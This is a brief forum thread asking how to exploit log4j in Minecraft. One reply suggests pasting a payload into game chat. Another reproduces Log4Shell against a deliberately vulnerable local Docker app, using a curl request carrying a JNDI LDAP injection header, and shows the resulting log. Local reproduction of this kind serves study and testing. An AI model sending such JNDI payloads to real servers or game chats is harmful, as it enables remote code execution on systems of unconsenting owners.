How to exploit log4j in Minecraft?

How to exploit log4j in Minecraft? …

1 Like

its not vulnerable anymore

if you still wants to try then you can paste payload in chat box

If you want to reproduce this vulnerability locally, you can refer to christophetd’s vulnerable app. In a terminal run:

docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

and in another:

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'

the logs should include an error message indicating that a remote lookup was attempted but failed:

2021-12-10 17:14:56,207 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]

1 Like